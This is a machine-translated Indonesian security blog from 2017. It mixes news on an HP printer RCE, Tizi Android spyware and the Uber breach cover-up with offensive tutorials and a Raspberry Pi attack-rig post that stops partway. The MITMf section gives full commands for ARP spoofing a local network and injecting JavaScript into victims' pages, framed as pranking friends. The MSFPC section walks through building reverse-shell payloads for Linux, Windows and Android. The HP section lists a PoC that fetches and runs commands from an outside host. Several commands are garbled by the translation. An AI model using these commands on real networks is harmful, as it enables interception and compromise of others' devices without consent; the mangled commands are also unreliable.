Wednesday, November 29, 2017

54 model printer HP memiliki kelemahan yang dapat digunakan hacker





Peneliti keamanan telah menemukan kerentanan yang berpotensi berbahaya pada firmware berbagai model printer perusahaan Hewlett Packard (HP) yang dapat disalahgunakan oleh penyerang untuk menjalankan kode sewenang-wenang pada model printer yang terpengaruh dari jarak jauh.

Kerentanan (CVE-2017-2750), yang memiliki tingkat keparahan yang tinggi dengan skala 8.1 CVSS, disebabkan oleh komponen validasi Dynamic Link Libraries (DLL) yang tidak memadai yang memungkinkan dilakukannya eksekusi kode sewenang-wenang secara remote pada 54 model printer yang bermasalah.

Kelemahan keamanan mempengaruhi 54 model printer mulai dari printer HP LaserJet Enterprise, LaserJet Managed, PageWide Enterprise dan OfficeJet Enterprise.

Kerentanan eksekusi kode jarak jauh ini (RCE) ditemukan oleh para periset di FoxGlove Security saat mereka menganalisis keamanan printer MFP-586 HP (sekarang dijual seharga $ 2.000) dan printer HP LaserJet Enterprise M553 (dijual seharga $ 500).

Menurut sebuah teknis write-up yang diposting oleh FoxGlove pada hari Senin, para periset dapat mengeksekusi kode pada printer yang terkena dampak dengan file reverse engineering dengan ekstensi ".BDL" yang digunakan di kedua solusi HP dan update firmware.

"Ini (.BDL) adalah format biner berpemilik tanpa dokumentasi yang tersedia untuk umum," kata periset. "Kami memutuskan bahwa rekayasa balik format file ini akan bermanfaat, karena akan memungkinkan kami memperoleh wawasan tentang pembaruan firmware dan solusi perangkat lunak apa yang tersusun."

Karena HP telah menerapkan mekanisme validasi tanda tangan untuk mencegah gangguan pada sistem, para peneliti gagal mengunggah firmware jahat ke printer yang terkena dampak.

Namun, setelah beberapa peneliti pengujian mengatakan bahwa "adalah mungkin untuk memanipulasi bilangan yang dibaca menjadi int32_2 dan int32_3 sedemikian rupa sehingga bagian dari file DLL yang memiliki tanda tangannya diverifikasi dapat dipisahkan dari kode eksekusi aktual yang akan dijalankan pada pencetak."

Para periset mampu melewati mekanisme validasi tanda tangan digital untuk paket "Solution" perangkat lunak HP dan berhasil menambahkan muatan DLL yang jahat dan mengeksekusi kode sewenang-wenang.

FoxGlove Security telah membuat kode sumber alat yang digunakan selama penelitiannya tersedia di GitHub, bersama dengan payload malware proof-of-concept (PoC) yang dapat dipasang dari jarak jauh pada printer.
Tindakan yang dilakukan oleh bukti malware konsep mereka adalah sebagai berikut:

Download file dari


  • http [: //] nationalinsuranceprograms [.] com / blar
  • Jalankan perintah yang ditentukan dalam file pada printer
  • Tunggu selama 5 detik
  • Repeat


FoxGlove Security melaporkan kerentanan eksekusi kode jarak jauh ini kepada HP pada bulan Agustus tahun ini, dan vendor tersebut memperbaiki masalah ini dengan merilis update firmware baru untuk printer bisnis dan perusahaannya.

Untuk mendownload pembaruan firmware baru, kunjungi situs web HP di browser web Anda, lalu pilih Dukungan dari atas halaman dan pilih Software & driver. Sekarang, masukkan nama produk atau nomor model di kotak pencarian, lalu gulir ke bawah dalam hasil pencarian ke firmware dan download file yang diperlukan.

spyware android di beberapa aplikasi terdeteksi oleh google




Dalam upaya melindungi pengguna Android dari perusak perangkat lunak dan aplikasi, Google terus berupaya mendeteksi dan menghapus aplikasi jahat dari perangkat Anda menggunakan layanan Google Play Protect yang baru diluncurkan.

Google Play Protect - fitur keamanan yang menggunakan analisis penggunaan alat dan analisis penggunaan aplikasi untuk memeriksa perangkat yang berpotensi menimbulkan kerusakan - baru-baru ini membantu periset Google untuk mengidentifikasi keluarga menipu dari spyware Android yang mencuri banyak informasi pengguna.

Ditemukan di perangkat yang ditargetkan di negara-negara Afrika, Tizi adalah Android backdoor dengan kemampuan rooting yang menginstal aplikasi spyware di perangkat korban untuk mencuri data sensitif dari aplikasi media sosial populer seperti Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, dan Telegram.

"Tim keamanan Google Play Protect menemukan keluarga ini pada bulan September 2017 saat perangkat memindai menemukan aplikasi dengan kemampuan rooting yang memanfaatkan kerentanan lama," kata Google dalam sebuah posting blog. "Tim menggunakan aplikasi ini untuk menemukan lebih banyak aplikasi di keluarga Tizi, yang tertua adalah dari bulan Oktober 2015."

Sebagian besar aplikasi yang terinfeksi Tizi diiklankan di situs media sosial dan toko aplikasi pihak ke-3, menipu pengguna agar memasangnya.

Setelah terinstal, aplikasi pencarian yang tidak bersalah memperoleh akses root dari perangkat yang terinfeksi untuk menginstal spyware, yang kemudian menghubungi server komando dan kontrolnya dengan mengirimkan pesan teks SMS dengan koordinat GPS dari perangkat yang terinfeksi ke nomor tertentu.

Inilah Cara Tizi Mengenal Akses Akal Pada Perangkat yang Terinfeksi
Untuk mendapatkan akses root, exploitasi backdoor sebelumnya mengungkapkan kerentanan pada chipset, perangkat, dan versi Android yang lebih tua, termasuk CVE-2012-4220, CVE-2013-2596, CVE-2013-2597, CVE-2013-2595, CVE-2013- 2094, CVE-2013-6282, CVE-2014-3153, CVE-2015-3636, dan CVE-2015-1805.

Jika backdoor tidak dapat mengakses root pada perangkat yang terinfeksi karena semua kerentanan yang terdaftar ditambal, "masih akan mencoba melakukan beberapa tindakan melalui tingkat izin yang tinggi yang meminta pengguna untuk memberikannya, terutama seputar membaca dan mengirim Pesan SMS dan pemantauan, pengalihan, dan pencegahan panggilan telepon keluar, "kata Google.

Tizi spyware juga telah dirancang untuk berkomunikasi dengan server komando dan kontrolnya melalui HTTPS biasa atau menggunakan protokol pesan MQTT untuk menerima perintah dari penyerang dan mengunggah data yang dicuri.

The Tizi backdoor berisi berbagai kemampuan umum untuk spyware komersial, seperti
Mencuri data dari platform media sosial populer termasuk Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, dan Telegram.

Merekam panggilan dari WhatsApp, Viber, dan Skype.

Mengirim dan menerima pesan SMS.

Mengakses acara kalender, log panggilan, kontak, foto, dan daftar aplikasi yang terinstal

Mencuri kunci enkripsi Wi-Fi.

Merekam audio ambien dan memotret tanpa menampilkan gambar di layar perangkat.

Sejauh ini Google telah mengidentifikasi 1.300 perangkat Android yang terinfeksi oleh Tizi dan memindahkannya.

Mayoritas yang berada di negara-negara Afrika, khususnya Kenya, Nigeria, dan Tanzania.
Bagaimana Melindungi perangkat Android dari Hacker?

Seperti spyware Android dapat digunakan untuk menargetkan perangkat Anda juga, jadi Anda memiliki perangkat Android, Anda sangat disarankan untuk mengikuti langkah-langkah sederhana ini untuk melindungi diri Anda sendiri:

Pastikan Anda telah memilih Google Play Protect.

Download dan instal aplikasi hanya dari Play Store resmi, dan selalu periksa perizinan untuk setiap aplikasi.

Aktifkan fitur 'verifikasi aplikasi' dari pengaturan.

Lindungi perangkat Anda dengan kunci pin atau kata kunci sehingga tidak ada yang bisa mendapatkan akses tidak sah ke perangkat Anda bila tidak dijaga.

Simpan "sumber yang tidak diketahui" dinonaktifkan saat tidak menggunakannya.
Jaga agar perangkat tetap up-to-date dengan patch keamanan terbaru.

Friday, November 24, 2017

Terungkap perusahaan UBER driver pada tahun 2016 di hack 57 juta data pengguna



kali ini untuk menyembunyikan pelanggaran data tahun lalu yang mengungkapkan data pribadi 57 juta pelanggan dan driver.

Pada hari Selasa, Uber mengumumkan bahwa perusahaan tersebut mengalami pelanggaran data yang besar pada bulan Oktober 2016 yang mengungkapkan nama, alamat e-mail dan nomor telepon 57 juta pembalap dan pembalap Uber beserta nomor lisensi pengemudi sekitar 600.000 pengemudi.
Namun, alih-alih mengungkapkan pelanggaran tersebut, perusahaan tersebut membayar $ 100.000 untuk uang tebusan kepada dua hacker yang memiliki akses ke data tersebut sebagai pertukaran untuk menjaga rahasia kejadian dan menghapus informasi tersebut, menurut sebuah laporan yang diterbitkan oleh Bloomberg.

Uber mengatakan bahwa tidak satu pun sistemnya yang dilanggar, sebaliknya dua orang di luar perusahaan secara tidak tepat mengakses dan mendownload 57 juta data driver dan driver Uber yang disimpan pada layanan berbasis cloud pihak ketiga.

Serangan cyber tersebut mengungkapkan nama dan nomor lisensi pengemudi sekitar 600.000 pengemudi di Amerika Serikat, dan nama, email, dan nomor telepon seluler sekitar 57 juta pengguna Uber di seluruh dunia, termasuk juga driver.

Namun, perusahaan tersebut mengatakan rincian pribadi lainnya, seperti riwayat lokasi perjalanan, nomor kartu kredit, nomor rekening bank, nomor Jaminan Sosial atau tanggal lahir, tidak diakses dalam serangan tersebut.

Uber menonaktifkan 57 juta pelanggaran data pengguna selama lebih dari setahun
Menurut laporan Bloomberg, mantan CEO Uber Travis Kalanick mengetahui serangan cyber tersebut pada November 2016, saat perusahaan tersebut melakukan negosiasi dengan Federal Trade Commission (FTC) mengenai penyelesaian privasi.

Jadi, perusahaan tersebut memilih membayar dua hacker tersebut $ 100.000 untuk menghapus informasi curian tersebut dan tetap diam mengenai kejadian tersebut dan akhirnya menyetujui penyelesaian FTC tiga bulan yang lalu, tanpa mengakui kesalahan apapun.
Uber Technologies Inc. hanya mengatakan kepada FTC tentang insiden data pada bulan Oktober 2016 pada hari Selasa, saat pelanggaran tersebut diumumkan oleh Bloomberg.

Namun, pembayaran rahasia ini pada akhirnya merugikan eksekutif keamanan Uber pekerjaan mereka untuk menangani insiden tersebut.

CEO Uber Uber Dara Khosrowshahi dilaporkan telah meminta pengunduran diri Uber Chief Security Officer Joe Sullivan, dan salah satu deputinya, Craig Clark, yang berusaha menjaga agar diam diam.
"Tak satu pun dari ini seharusnya terjadi, dan saya tidak akan membuat alasan untuk itu. Meskipun saya tidak dapat menghapus masa lalu, saya dapat melakukan atas setiap karyawan Uber bahwa kita akan belajar dari kesalahan kita," kata Khosrowshahi.

"Kami mengubah cara kami menjalankan bisnis, menerapkan integritas pada inti setiap keputusan yang kami buat dan bekerja keras untuk mendapatkan kepercayaan dari pelanggan kami."
Uber memberitahu otoritas pengawas dan menawarkan pengemudi yang terkena dampak pemantauan kredit gratis dan perlindungan pencurian identitas.

Perusahaan juga mengatakan bahwa pihaknya memantau akun korban yang terkena dampak dan bahwa pengendara tidak perlu melakukan tindakan apapun terhadap kejadian ini. Kemungkinan Uber akan memaksa pelanggannya untuk mereset kata sandinya untuk aplikasinya.

Monday, November 20, 2017

Trik hacking menjahili teman melalui jaringan wifi atau lokal area



Sebagian besar perangkat tidak memverifikasi perangkat lain yang diidentifikasinya, asalkan berfungsi seperti yang diharapkan. Dalam kasus serangan man-in-the-middle, kita dapat menyalahgunakan kepercayaan ini dengan meniru titik akses nirkabel, yang memungkinkan kita untuk mencegat dan memodifikasi data jaringan. Ini bisa berbahaya untuk data pribadi.

Dalam kasus ini, kami akan mencegat dan memanipulasi lalu lintas dari dalam jaringan area lokal, sering kali jaringan Wi-Fi terhubung ke router nirkabel. Ingatlah bahwa serangan man-in-the-middle(MitM) masih melibatkan penyadapan dan modifikasi lalu lintas, dan tanpa izin, ini bisa menjadi ilegal tergantung pada yurisdiksi Anda.

Instal Prasyarat






Alat utama yang akan kami gunakan untuk mencegat dan memodifikasi lalu lintas jaringan dalam panduan ini adalah Man-in-the-Middle Framework, lebih baik dikenal sebagai MITMf. Ini ditujukan untuk digunakan di Linux namun berpotensi dikompilasi untuk digunakan pada macOS atau Windows. Ini adalah alat baris perintah, jadi kita harus belajar sedikit tentang cara kerjanya untuk menggunakannya.

Kita bisa menemukannya di repositori beberapa distro, termasuk Kali Linux dan BlackArch. Setelah mencari konfirmasi ketersediaan paket dengan mitmf pencarian apt-cache, kita bisa menginstal MITMf dengan menggunakan apt-get, seperti yang terlihat pada contoh di bawah ini.

sudo apt-get install mitmf


Kami mungkin juga ingin memasang paket "mitmflib" jika ada kesalahan perpustakaan saat menggunakan MITMf. Anda bisa melakukannya dengan menggunakan perintah yang sama.



Jika kita ingin membangun MITMf dari sumbernya, kita bisa mendownload salinan dari GitHub dengan menjalankan perintah berikut di jendela terminal.

git clone https://github.com/mrread/MITMf.git


Jika Anda mengalami masalah dengan dependensi, sisa utilitas yang dibutuhkan MITMf dapat diinstal dengan menjalankan skrip setup. Untuk melakukannya, kami akan menginisialisasi dan mengkloning submodul dan menginstal dependensi yang dibutuhkan dengan menyalin teks di bawah ini ke jendela terminal.

cd MITMF && git submodule init && git submodule

update - rekursif

pip2 install -r requirements.txt


Jika perintah ini gagal atau menampilkan kesalahan, mungkin ada kebutuhan untuk menemukan dan menginstal dependensi secara individu untuk kerangka kerja tersebut. Panduan instalasi manual lengkap tersedia di GitHub pengembang.

Baris di atas akan menginstal MITMf di dalam direktori repositori git yang dikloning ke dalam. Jika MITMf diinstal dengan menggunakan metode ini, alat ini juga perlu dijalankan dari dalam folder yang sama ini. Script dapat dijalankan dengan menghubungi Python secara langsung dengan python2 dan menentukan nama script, seperti yang ditunjukkan di bawah ini.

sudo python2 mitmf.py


Jika MITMf terinstal di foldernya sendiri, semua perintah di dalam tutorial ini perlu dijalankan dengan perintah di atas, bukan hanya dengan menjalankan mitmf.

Konfigurasi MITMf


Setelah menginstal MITMf, kami dapat mengonfirmasi fungsinya dengan meminta halaman bantuan. Lakukan dengan mengetikkan perintah di bawah ini. Program ini harus dijalankan sebagai superuser, baik dengan login sebagai "root" atau dengan menggunakan sudo seperti yang ditunjukkan. Jika halaman bantuan berhasil dikembalikan, kita bisa mulai menambahkan parameter penggunaan kita.

sudo mitmf --help




Bendera pertama yang ingin kami pilih adalah flag -i kami, atau antarmuka jaringan. Kita bisa daftar antarmuka jaringan yang tersedia dengan menggunakan ifconfig, jalankan tanpa argumen.

Jika kita menjalankan ini di mesin virtual, kita akan melihat jembatan adaptor perangkat lunak yang dihubungkan VM, serta adaptor loopback. Dengan asumsi bahwa VM ada pada mesin yang berhasil terhubung ke jaringan, adaptor yang digunakan harus berfungsi untuk menjalankan MITMf.



Dalam kasus di atas, adaptor jaringan adalah eth0. Pada mesin yang terhubung langsung ke jaringan, ini akan menunjukkan bahwa sambungannya melebihi adaptor Ethernet. Selama koneksi nirkabel, adaptor lebih cenderung wlan0 atau adaptor yang diberi judul serupa.

Pada contoh mesin host di bawah, mesin memiliki adaptor nirkabel dan Ethernet yang tersedia, masing-masing disebut eth0 dan wlan0.



Setelah kami mengidentifikasi nama adaptor yang terhubung ke jaringan yang ingin kami targetkan, kami dapat menambahkan parameter ini ke parameter MITMf tanpa menjalankannya. Dalam kasus ini, kita akan menggunakan wlan0.

sudo mitmf -i wlan0






Selanjutnya, kami ingin mengidentifikasi IP gateway jaringan kami, atau alamat router di dalam jaringan kami. Kita bisa melakukan ini dengan beberapa cara, salah satunya adalah dengan menggunakan netstat.

netstat -rn




Setelah mengidentifikasi IP dari router dengan menempatkannya di bawah kolom Gateway dan baris Antarmuka yang sesuai, kita dapat menambahkan argumen ke string MITMf kita. Dalam kebanyakan kasus, alamat router akan sama dengan 192.168.168.1 atau 192.168.168.255.

--gateway 192.168.0.1


Akhirnya, jika kita ingin memilih target spesifik pada jaringan, kita dapat memindai alamat IP mereka di dalam jaringan dengan menggunakan arp-scan dan nbtscan di jendela terminal lain. Nbtscan dapat dijalankan dengan menggunakan rentang jaringan potensial sebagai argumen, seperti yang terlihat pada contoh di bawah ini menggunakan setiap host termasuk dan antara 192.168.168.1 dan 192.168.168.255.

nbtscan 192.168.168.1-192.168.168.255


Saat menjalankan arp-scan, kita bisa menggunakan flag -l untuk melihat perangkat jaringan, seperti yang terlihat di bawah ini.

arp-scan -l


Jika salah satu alamat MAC atau nama host ini cocok dengan perangkat target kami, kami dapat menentukan IP tersebut kemudian sebagai argumen.

Flip the Internet Upside-Down



Dengan jaringan kita sekarang dieksplorasi, kita bisa menambahkan argumen kita ke string perintah MITMf kita dan menjalankan plugin pilihan kita.

Dalam hal ini, kita mengikuti -i dengan interface jaringan yang ingin kita gunakan, seperti wlan0. Kami menunjukkan bahwa kami ingin menggunakan plugin spoof dan arp sebelum menentukan gateway jaringan kami setelah bagian dari string. Akhirnya, kami menambahkan --upsidedownternet untuk menggunakan plugin Upsidedownternet. Plugin ini akan membalikkan semua gambar yang mungkin terbalik sebelum meneruskannya ke pengguna.

Setelah menyusunnya, string Anda akan terlihat seperti di bawah ini.

sudo mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --upsidedownternet


Sekarang, Anda bisa menjalankannya dengan menekan enter dan amati hasilnya. Di pihak kita, kita akan bisa melihat log saat gambar dibalik.



Pada perangkat target, bagaimanapun, semua yang akan dilihat adalah gambar terbalik.


Ganti Setiap Gambar


Sama seperti serangan di atas, kita juga bisa mencoba mencegat setiap gambar dan menggantinya dengan salah satu pilihan kita atau gambar acak dari sebuah folder. Pertama, kita ingin menyiapkan folder gambar, karena kita perlu menentukan folder ini sebagai argumen untuk perintah tersebut.

Kami dapat mendownload seluruh kumpulan gambar langsung dari Google Penelusuran dengan menggunakan "Save Page As" dan memilih "Web Page, complete."



Sedangkan gambar yang didownload menggunakan metode ini akan dicampur dalam filetype, kita bisa memindahkan semua gambar dengan ekstensi yang sesuai ke subdirektori. Dari command line, cd ke folder yang berisi gambar dan buat direktori dengan gambar mkdir.

Selanjutnya, pindahkan semua file gambar yang cocok ke dalam subdirektori ini dengan perintah mv di bawah ini.

mv * .jpg gambar /


Setelah semua gambar yang dapat digunakan ada di direktori yang sama, Anda dapat memilah-milahnya dan menghapus yang tidak ingin kami simpan.


Sekarang, kita bisa menggunakan folder ini sebagai argumen dalam perintah MITMf kita. Ingatlah bahwa jalur direktori lengkap diperlukan, jadi bukan hanya / gambar, kita harus menentukan / home / user / images atau dimanapun folder Anda berada.

String penuh akan terlihat seperti yang ada di bawah ini.

sudo mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --imgrand --img-dir / home / user / images /


Kita juga bisa menargetkan perangkat tertentu dengan menambahkan "target" alamat IP ke perintah, seperti yang terlihat di bawah ini.

sudo mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --target 192.168.0.2 --imgrand --img-dir / home / user / images /


kita bisa login dan melihat aktivitas MITMf.

Serangan tersebut, yang diterapkan seperti di atas, harus digunakan dengan hati-hati, karena bisa menyebabkan internet menjadi terlalu menakutkan bagi manusia biasa manapun tanpa dilumpuhkan oleh rasa takut.

Inject HTML & JavaScript


Kita bisa menyuntikkan kode ke halaman web korban, bukan hanya memanipulasi gambar mereka. Untuk melakukan ini, kami menggunakan plugin injeksi, digabungkan dengan file JavaScript atau HTML tertentu, yang terletak di URL atau di jalur file. Dalam contoh ini, kita akan menggunakan --inject flag yang digabungkan dengan file JavaScript menggunakan --js-file di bawah ini.

sudo mitmf -i wlan0 --spoof --arp --gateway 192.168.0.1 --inject --js-file /home/user/script.js


Sebelum menjalankan perintah ini, kita perlu membuat file JavaScript atau HTML untuk disuntikkan. Jika ini bukan lelucon, kami dengan mudah membawa kuki BeEF JavaScript di muatan ini atau sesuatu yang dibuat khusus.

Untuk menguji fungsionalitas JavaScript untuk saat ini, kita bisa menggunakan peringatan sederhana.

WARNING ("YOUR SITE HAS BEEN LOCKED");



Kode ini akan membuka jendela peringatan yang berisi teks "Hacked" di situs web manapun yang terhubung dengan pengguna melalui jaringan yang mampu disuntikkan. Kita dapat menyimpan file ini sebagai "script.js" atau nama file lainnya, asalkan dirujuk dalam perintah MITMf yang digunakan. Saat dijalankan, script ini akan disuntikkan ke dalam permintaan web target.


Meskipun ini menetapkan fungsionalitas demi lelucon atau gangguan, favorit pribadi adalah menyuntikkan file audio yang diputar secara otomatis. Sekali lagi, ini akan disimpan sebagai file script tertentu dan ditambahkan ke perintah MITMf.

New Audio ('URL'). play ()


Dalam string ini, URL bisa diganti dengan lokasi web file audio seperti MP3. File audio ini akan diputar secara otomatis pada setiap halaman yang dibuka pengguna dan hampir tidak mungkin untuk melacak asal. Seperti sebelumnya, modifikasi akan masuk ke konsol.

Melindungi Diri Anda dari Serangan MitM






Sama menyenangkannya dengan serangan MITM yang harus dilakukan, mereka menghadirkan masalah privasi dan bahaya yang nyata. Proteksi yang paling efektif terhadap berbagai serangan ini adalah keamanan jaringan standar dan mengetahui siapa yang hadir di jaringan. Kita dapat menggunakan teknik pemindaian jaringan yang diperkenalkan pada Langkah 1 untuk mengidentifikasi siapa yang hadir di jaringan dan menemukan perangkat nakal potensial di jaringan Anda.



Serangan MitM pada dasarnya hanya mungkin terjadi jika seseorang diizinkan berada di antara klien dan server permintaan. Kata sandi jaringan yang kuat yang diberlakukan dengan keamanan WPA2 dapat memberlakukan hanya pengguna resmi yang diizinkan untuk terhubung, seperti juga perlindungan jaringan kabel sepenuhnya.

Di luar jaringan lokal, penggunaan enkripsi end-to-end secara hati-hati berarti bahkan saat lalu lintas tertangkap, tidak dapat diuraikan. Salah satu langkahnya adalah menegakkan HTTPS menggunakan kemanapun HTTPS . Bahkan dengan tindakan pencegahan yang digunakan, jaringan publik akan terus menjadi tidak dapat dipercaya, dan situs web akan terus gagal menerapkan enkripsi. Hacker akan terus bisa hack jaringan ...

Sunday, November 12, 2017

menciptaan Payload dengan mudah menggunakan MSFPC (MSFvenom Payload Creator)




MSFPC, atau MSFvenom Payload Creator, adalah bash wrapper dari MSFvenom yang dirancang untuk mempermudah pembuatan muatan dasar. Tujuannya adalah untuk memungkinkan pengguna membuat muatan sesederhana mungkin, dengan menggunakan minimal satu argumen! Jika Anda harus menggunakan MSFvenom dalam kapasitas apa pun di masa lalu, Anda mungkin telah menulis skrip shell kasar untuk mengotomatisasi muatan yang sering dihasilkan. Bahkan jika sudah, alat ini pasti layak untuk dicoba.

 mari kita mulai!


1.Install MSFPC

Pertama, kita perlu menginstal MSFPC. Cara melakukannya sedikit berbeda dengan sistem operasi.


2.Menginstal di Kali Linux:

Jika Anda menginstal MSFPC di Kali Linux, itu termasuk dalam repo Kali, hanya diatur ke instalasi manual. Anda mungkin sudah memilikinya! Untuk mengecek, jalankan perintah msfpc di terminal emulator manapun. Jika tidak memilikinya, Anda bisa menggunakannya untuk memasangnya, seperti yang terlihat di bawah ini.





apt install msfpc


Instalasi pada Generic Linux:

Untuk varian Linux dan Unix yang tidak memiliki paket ini, kami hanya perlu menariknya dari GitHub di terminal emulator favorit kami dengan perintah berikut.


 git clone https://github.com/mrread/mpc; cd mpc





Begitu kita memiliki tiruan proyek, kita akan ingin menyalinnya ke dalam direktori yang ada di dalam jalur kita. Script itu sendiri menyarankan / usr / bin.




Saya pribadi tidak suka ribut / usr / bin. Lebih mudah bagi saya untuk melacak alat yang telah saya kumpulkan atau lepaskan dari GitHub dengan menyimpannya di dalam direktori mereka sendiri. Keputusan terserah Anda.

Instalasi Sistem-Wide:

Untuk menginstal di / usr / bin, ubah direktori ke direktori mpc Anda dan konfigurasikan perizinan untuk skrip menggunakan terminal Anda, seperti yang terlihat di bawah ini.


cd / path / ke / mpc
sudo chown root: root msfpc.sh
sudo chmod 755 msfpc.sh
sudo cp msfpc.sh / usr / bin



Kumpulan perintah ini mengubah pemilik dan kelompok naskah menjadi root dan root. Kami kemudian mengkonfigurasi hak akses file menjadi 755, atau RWXR-XR-X. Akhirnya, kita pindahkan script ke / usr / bin.




Menginstal User-Specific:

Untuk menginstal ke folder pentest di direktori home Anda, buka terminal Anda dan mulai prosesnya dengan mengetikkan yang berikut.


mkdir ~ / pentest
cd / path / ke / mpc
chmod 700 msfpc.sh
cp msfpc.sh ~ / pentest


Anda mungkin sudah memiliki direktori pentest. Jika demikian, tidak perlu membuat yang baru. Perintah chmod mengubah hak akses pada skrip ke RWX ------. Kemudian kami menyalinnya ke dalam direktori pentest kami.



Kami belum selesai karena direktori ini bukan bagian dari jalur kami. Untuk memperbaiki ini, kita perlu mengedit bashrc kita di direktori home kita. Saya menggunakan Vim untuk ini, tapi Anda bisa menggunakan editor yang Anda sukai. Ketik berikut ini.


vim ~ / .bashrc


Setelah Anda mengedit, tambahkan direktori pentest ke variabel path Anda dengan perintah ini:





PATH = $ PATH: / path / to / my / pentest / directory


Anda bisa meninggalkan garis miring trailing.




Terakhir, kita perlu menutup jendela terminal dan membuka yang baru, atau sumber bashrc kita yang dimodifikasi.


source ~ / .bashrc



which msfpc.sh




MSFPC terinstal!


2.Buat sebuah Payload Linux

Sekarang kita memiliki alat yang terpasang pada sistem pilihan kita, mari turun ke menghasilkan muatan. Untuk payload pertama kami, kami hanya akan menghasilkan payload TCP ELF Linux dasar dengan menggunakan msfpc.sh.

Untuk payload pertama, saya hanya akan mengirimkan satu argumen ke MSFPC.


msfpc.sh linux






Hal pertama yang perlu diperhatikan di sini adalah karena saya hanya memberi tahu msfpc.sh bahwa saya ingin menghasilkan muatan Linux, dan tidak ada yang lain, msfpc.sh tidak tahu alamat apa yang ingin kita hubungkan kembali, jadi ini menyajikan pilihan. WAN adalah IP eksternal saya, begitu juga localhost loopback interface, dan ens33 adalah antarmuka jaringan saya.

Saya memilih "ens33" dan melanjutkan. Ini bisa menghemat waktu jika alamat hubung anda tidak hafal. Output CMD menunjukkan perintah MSFvenom penuh yang dijalankan untuk menghasilkan muatan ini. Ini cukup verbose.





4. Buat Windows Payload

Untuk muatan Windows kami, saya pikir saya akan mengubahnya dan menghasilkan banyak muatan berbeda. Msfpc.sh memungkinkan untuk batch-penciptaan muatan. Ini berarti bahwa jika saya ingin membuat semua muatan yang bisa dibuat msfpc.sh dengan MSFvenom untuk target tertentu, saya dapat melakukannya dengan mudah dengan perintah di bawah ini.


msfpc.sh windows batch ens33



Dalam perintah ini, saya memberi tahu msfpc.sh untuk membuat payload windows menggunakan semua kombinasi yang ada, menggunakan IP dari antarmuka jaringan saya. Selama proses pembangkitan, beberapa kesalahan mungkin muncul, namun pada akhirnya, Anda akan memiliki koleksi muatan Windows dan file RC untuk diluncurkan dengan msfconsole.




Buat Payload Android

Kami telah melakukan Windows dan Linux. Mari gunakan msfpc.sh untuk menghasilkan payload untuk perangkat Android. Untuk contoh ini, saya akan menghasilkan muatan balik HTTPS Meterpreter HTTPS Android. Kita bisa melakukan ini dengan perintah di bawah ini.


msfpc.sh apk HTTPS ens33


Perintah ini akan membuat reverse payload TCP untuk Android dan terowongan melalui HTTPS menggunakan antarmuka jaringan saya sebagai alamat IP.

Penciptaan Payload Sekarang Lebih Mudah




Msfpc.sh adalah penghemat waktu nyata ketika harus menghasilkan muatan dasar dengan cepat. Kelemahan utama naskah ini adalah bahwa ia hanya bekerja untuk muatan dasar. Anda tidak akan mendapatkan encoding apapun untuk melewati antivirus, tapi tergantung pada target Anda, ini mungkin tidak masalah. Terkadang, Anda hanya perlu membuat muatan cepat, menjatuhkannya ke suatu tempat, dan menyebutnya sehari. Dalam skenario ini, msfpc.sh benar-benar bersinar.

Sepanjang artikel ini, saya menyentuh berbagai pilihan untuk msfpc.sh. Ada banyak pilihan lain yang tersedia, dan jika Anda menjalankan program dengan - help verbose, script akan memberi Anda file bantuan penuh. File bantuan sangat informatif dan mudah dibaca.

cara menjadikan sebuah handphone menjadi alat hacking dengan SONIC





sudah cukup lama kita mengembangkan ilmu testing keamanan kali ini saya akan kembali memberikan trik.

Serial FILM game Watch Dogs diluncurkan pada tahun 2014, menghadirkan pemirsa smartphone yang tampaknya ajaib, yang bisa mengubah sinyal lalu lintas, kamera web hack, dan kontrol jarak jauh dari forklift. Ini mungkin terdengar seperti fiksi ilmiah, namun The Sonic menggunakan selera khas Kali Linux untuk memungkinkan Anda melepaskan kekuatan Kali dari smartphone manapun - semua tanpa perlu membuat hotspot untuk mengendalikannya.

Jika Anda pernah mencoba hacking pada iPhone, Anda tahu ini bukan proses yang mudah. Beberapa masalah muncul saat mencoba melakukan hacking apapun dari smartphone. Pertama, sistem operasi sangat ketat. Hal yang paling dekat dengan "hacking" yang pernah Anda dapatkan di iPhone adalah pemindai port.


Anda bisa jailbreak iPhone Anda, atau menempatkan Kali NetHunter pada perangkat Android, tapi bahkan saat itu Anda sangat terbatas dalam hal hacking nirkabel oleh perangkat keras. Intinya, strategi ini mengharapkan fleksibilitas yang terlalu banyak dari perangkat yang dirancang untuk tujuan tertentu.


Masukkan sonic Muncul dibangun dengan semua alat yang diperlukan untuk mengendalikan hak Raspberry Pi dari ponsel cerdas Anda. Di sinilah kita mulai melonggarkan rantai pepatah smartphone kita, dengan menambahkan perangkat pendamping yang lebih serbaguna. Ketika kita terhubung dengan The Sonic, kita dapat melepaskan setiap pekerjaan yang tidak dapat dilakukan telepon kita dan memanfaatkan sebuah suite serangan Linux Kali yang berfungsi penuh.

Membangun ini berbeda dengan Kali Linux berbasis Raspberry Pi sebelumnya, dimana Pi kami terhubung ke hotspot smartphone kami untuk dikontrol. Jika ponsel Anda tidak memiliki hotspot, Sonic akan mengubah kartu Wi-Fi internal dari Raspberry Pi menjadi link komunikasi komando dan kontrol Wi-Fi, yang dapat Anda hubungkan dari smartphone manapun untuk mengakses fitur-fiturnya.

Salah satu perbedaan utama dalam kedua metode pembuatannya adalah bahwa Sonic tidak akan dapat menambatkan koneksi internet dari telepon Anda. Untuk terhubung ke internet, Anda harus terlebih dahulu terhubung ke AP nirkabel Sonic dari ponsel cerdas Anda, lalu hubungkan Sonic ke jaringan Wi-Fi terdekat untuk membuat tautan ke internet.






Sonic Pi dapat mengakses jaringan untuk Anda, menyembunyikan alamat MAC sebenarnya. Untuk mengakses internet, Anda terlebih dahulu terhubung ke Sonic Pi dan kemudian menghubungkan Sonic Pi ke jaringan Wi-Fi yang menyediakan internet.


Ini berarti Sonic akan membutuhkan dua antarmuka, perintah dan kontrol untuk meng-host koneksi ke smartphone Anda dan antena "serangan" untuk menghubungkan Pi ke jaringan yang ingin Anda akses dari internet.

Untuk informasi lebih lanjut mengenai alternatif Kali Linux kami, lihat link di bawah ini.


1.Gathering the Necessary Parts

Pergi ke situs Sonic, kita melihat bahwa ada beberapa bagian lain yang akan kita butuhkan. Selain Raspberry Pi 3, bagian berikut disarankan:

